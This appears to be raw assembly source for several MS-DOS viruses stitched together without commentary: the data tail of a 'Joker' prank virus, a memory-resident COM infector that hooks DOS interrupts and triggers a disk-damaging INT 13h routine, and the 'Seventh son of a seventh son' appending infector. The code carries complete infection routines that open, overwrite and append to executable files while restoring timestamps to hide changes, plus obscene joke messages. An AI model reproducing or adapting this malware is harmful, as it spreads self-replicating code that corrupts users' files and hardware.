& BEER into drive A: and',cr,lf pause db 'Strike any key when ready... $' db SimulateCritErr ;Prints ARIF message and responds appropriately msg1 db 'Impotence error reading user',39,'s dick$' db terminate ;Ends the program immediately msg2 db 'Program too big to fit in memory',cr,lf,'$' db halt ;Halts the system msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$' db terminate ;Ends the program immediately msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid' db ' I can',39,'t do that!',cr,lf,'$' db WaitKey ;Waits for a keypress, then runs the program msg6 db 'Format another? (Y/N)? $' db StackError ;Generates a stack overflow (halts the system) msg7 db 'Damn it! I told you not to touch that!$' db terminate ;Ends the program immediately msg8 db 'Suck me!',cr,lf,'$' db SimulateCritErr ;Prints ARIF message and responds appropriately msg9 db 'Cocksucker At Keyboard error reading device CON:$' db terminate ;Ends the program immediately msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf db 'I',39,'m sorry, but your call cannot be completed as dialed.' db cr,lf,'Please hang up & try your call again.',cr,lf,'$' db terminate ;Ends the program immediately msg11 db 'No!',cr,lf,cr,lf,'$' db halt ;Halts the system msg12 db 'Panic kernal mode interrupt$' db WaitKey ;Waits for a keypress, then runs the program msg13 db 'CONNECT 1200½',cr,lf,cr,lf,'$' db return2host ;Runs host program immediately msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$' db terminate ;Ends the program immediately msg15 db 'And if I refuse?',cr,lf,'$' db return2host ;Runs host program immediately msg16 db 'Fuck the world and its followers!',cr,lf,'$' db return2host ;Runs host program immediately msg17 db 'You are pathetic, man... you know that?',cr,lf,'$' db terminate ;Ends the program immediately msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$' db terminate ;Ends the program immediately msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$' db PauseKey ;Waits for keypress (SAKWR), then runs host prg msg20 db 'Joker! ver αα by TBSI!',cr,lf db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$' int24handler: xor al,al ;Ignore the error iret ;Interrupt return filespec: db '*.COM',0 ;File specification prevdir: db '..',0 ;previous directory max2kill db 3 ;max. files to infect eoec:;───────────────────────────────────────────────────End Of Encrypted Code VersionNumber dw 100h ;Version 1.00 encrypt_val db 0 ;1st-run copy only ; None of this information is included in the virus's code. It is only used ; during the search/infect routines and it is not necessary to preserve it ; in between calls to them. eof: DTA: db 21 dup (?) ;internal search's data attribute db ? ;attribute file_time db 2 dup (?) ;file's time stamp file_date db 2 dup (?) ;file's date stamp file_size db 4 dup (?) ;file's size filename db 13 dup (?) ;filename SavedAX dw ? ;Used to save AX infected db ? ;infection count addr dw ? ;Address boot_sector: main endp;rocedure code ends;egment end main done code segment byte public assume cs:code, ds:code, es:code, ss:code org 100h codebeg: mov ax,043FFh ; Remove virus from code! int 21h ; Let's allocate some mem! mov ax,ds sub ax,11h mov ds,ax cmp byte ptr ds:[0100h],5Ah jnz skip mov ax,ds:[0103h] sub ax,40h jb skip mov ds:[0103h],ax sub word ptr ds:[0112h],50h mov es,ds:[0112h] push cs pop ds mov cx,code_end-codebeg mov di,100h push di mov si,di rep movsb push es pop ds mov ax,351Ch int 21h mov word ptr ds:[int1Cret],bx mov word ptr ds:[int1Cret+2],es mov al,21h int 21h mov word ptr ds:[real21+1],bx mov word ptr ds:[real21+3],es mov ah,25h mov dx,offset int21beg int 21h mov al,1Ch mov dx,offset int1Cnew int 21h push cs push cs pop es pop ds ret skip: int 20h int21beg: push ax sub ax,4B00h jz infect pop ax cmp ax,043FFh ; Check if Harakiri. jne real21 mov ax,word ptr ds:[retdata] mov si,ax mov di,100h mov cx,code_end-codebeg rep movsb mov ax,100h pop cx pop cx push es push ax iret real21: db 0EAh, 00h, 00h, 00h, 00h ; Jump to org21vec. retdata: db 00h, 00h f_time: dw 0000h f_date: dw 0000h infect: pop ax push ax push bx push cx push di push ds push dx push si mov ah,43h ; Get file attr. int 21h mov ax,4301h and cx,0FEh ; Strip the Read-only-flag int 21h mov ax,3D02h ; Open victim. int 21h xchg ax,bx call sub_2 sub_2: mov di,sp ; God what I hate that Eskimo! mov si,ss:[di] inc sp inc sp push cs pop ds mov ax,5700h ; Get file's time and date int 21h mov [si-(sub_2-f_time)],cx mov [si-(sub_2-f_date)],dx ; And save them... mov ah,3Fh ; Read X byte from begin. mov cx,code_end-codebeg add si,code_end-sub_2 ; SI points to EOF mov dx,si int 21h cmp word ptr [si],'MZ' ; Mark Zimbowski? je close cmp word ptr [si],'ZM' ; Zimbowski Mark? je close mark: cmp word ptr [si+(mark-codebeg+4)],'YD' ; infected? je close call put_eof ; move file ptr to EOF cmp ax,(0FFFFh-(code_end-codebeg)-100h) ja close cmp ax,code_end-codebeg+100h jb close add ax,100h mov word ptr ds:[si-(code_end-retdata)],ax mov ah,40h ; Flytta beg to end. mov cx,code_end-codebeg mov dx,si int 21h mov ax,4200h ; fptr to filbeg. xor cx,cx xor dx,dx int 21h mov ah,40h ; Write virus to beg. mov cx,code_end-codebeg mov dx,si sub dx,cx int 21h close: mov ax,5701h mov cx,[si-(code_end-f_time)] mov dx,[si-(code_end-f_date)] int 21h mov ah,3Eh int 21h ; close file, bx=file handle pop si pop dx pop ds pop di pop cx pop bx pop ax jmp real21 put_eof: mov ax,4202h xor dx,dx xor cx,cx int 21h ret int1Cnew: push ax inc byte ptr cs:[counter] mov al,30h cmp byte ptr cs:[counter],al jz scan pop ax slut: jmp dword ptr cs:[int1Cret] scan: push bx push cx push di push ds push dx push es push si push cs pop ds cld xor bx,bx mov byte ptr cs:[counter],bh mov cx,0FA0h mov ax,0b800h mov es,ax xor di,di again: mov al,byte ptr cs:[text+bx] sub al,80h repnz scasb jnz stick maybe: inc di inc bx cmp bx,10d jz beep mov al,byte ptr cs:[text+bx] sub al,80h scasb jz maybe xor bx,bx jmp again beep: xor cx,cx mov bx,word ptr cs:[int1Cret] mov es,word ptr cs:[int1Cret+2] mov ax,251Ch int 21h overagain: mov dx,0180h xor bx,bx reset: mov ah,00h inc bx cmp bl,5h jz raise inc cx int 13h hoho: mov ax,0380h inc cx int 13h jc reset jmp hoho raise: xor cx,cx xor bx,bx inc dx cmp dl,85h jnz hoho jmp overagain stick: pop si pop es pop dx pop ds pop di pop cx pop bx pop ax jmp slut counter: db 00h text: db 'T'+80h, 'O'+80h, 'R'+80h, 'M'+80h, 'E'+80h, 'N'+80h db 'T'+80h, 'O'+80h, 'R'+80h, '!'+80h ; This is what it scans the screen for --^ int1Cret: db 0EAh, 00h, 00h, 00h, 00h code_end: ; THE END. code ends end codebeg done ;**************************************************************************** ;* Seventh son of a seventh son version 2 ;**************************************************************************** cseg segment assume cs:cseg,ds:cseg,es:cseg,ss:cseg FILELEN equ end - start MINTARGET equ 1000 MAXTARGET equ -(FILELEN+40h) org 100h .RADIX 16 ;**************************************************************************** ;* Dummy program (infected) ;**************************************************************************** begin: db 4Dh jmp start ;**************************************************************************** ;* Begin of the virus ;**************************************************************************** start: call start2 start2: pop bp sub bp,0103h lea si,[bp+offset begbuf-4] ;restore begin of file mov di,0100h movsw movsw mov ax,3300h ;get ctrl-break flag int 21 push dx xor dl,dl ;clear the flag mov ax,3301h int 21 mov ax,3524h ;get int24 vector int 21 push bx push es mov dx,offset ni24 - 4 ;set new int24 vector add dx,bp mov ax,2524h int 21 lea dx,[bp+offset end] ;set new DTA adres mov ah,1Ah int 21 add dx,1Eh mov word ptr [bp+offset nameptr-4],dx lea si,[bp+offset grandfather-4] ;check generation cmp [si],0606h jne verder lea dx,[bp+offset sontxt-4] ;7th son of a 7th son! mov ah,09h int 21 verder: mov ax,[si] ;update generations xchg ah,al xor al,al mov [si],ax lea dx,[bp+offset filename-4] ;find first COM-file xor cx,cx mov ah,4Eh int 21 infloop: mov dx,word ptr [bp+offset nameptr-4] call infect mov ah,4Fh ;find next file int 21 jnc infloop pop ds ;restore int24 vector pop dx mov ax,2524h int 21 pop dx ;restore ctrl-break flag mov ax,3301h int 21 push cs push cs pop ds pop es mov ax,0100h ;put old start-adres on stack push ax ret ;**************************************************************************** ;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) ;**************************************************************************** infect: cld mov ax,4300h ;ask attributes int 21 push cx xor cx,cx ;clear flags call setattr jc return1 mov ax,3D02h ;open the file int 21 jc return1 xchg bx,ax mov ax,5700h ;get file date & time int 21 push cx push dx mov cx,4 ;read begin of file lea dx,[bp+offset begbuf-4] mov ah,3fh int 21 mov al,byte ptr [bp+begbuf-4] ;already infected? cmp al,4Dh je return2 cmp al,5Ah ;or a weird EXE? je return2 call endptr ;get file-length cmp ax,MAXTARGET ;check length of file jnb return2 cmp ax,MINTARGET jbe return2 push ax mov cx,FILELEN ;write program to end of file lea dx,[bp+offset start-4] mov ah,40h int 21 cmp ax,cx ;are all bytes written? pop ax jnz return2 sub ax,4 ;calculate new start-adres mov word ptr [bp+newbeg-2],ax call beginptr ;write new begin of file mov cx,4 lea dx,[bp+offset newbeg-4] mov ah,40h int 21 inc byte ptr [si] ;number of next son return2: pop dx ;restore file date & time pop cx mov ax,5701h int 21 mov ah,3Eh ;close the file int 21 return1: pop cx ;restore file-attribute ; call setattr ; ret ;**************************************************************************** ;* Changes file-attributes ;**************************************************************************** setattr: mov dx,word ptr [bp+offset nameptr-4] mov ax,4301h int 21 ret ;**************************************************************************** ;* Subroutines for file-pointer ;**************************************************************************** beginptr: mov ax,4200h ;go to begin of file jmp short ptrvrdr endptr: mov ax,4202h ;go to end of file ptrvrdr: xor cx,cx xor dx,dx int 21 ret ;**************************************************************************** ;* Interupt handler 24 ;**************************************************************************** ni24: mov al,03 iret ;**************************************************************************** ;* Data ;**************************************************************************** begbuf db 0CDh, 20h, 0, 0 newbeg db 4Dh, 0E9h, 0, 0 nameptr dw ? sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$' grandfather db 0 father db 0 filename db '*.COM',0 db 'é¿░│▒' end: cseg ends end begin done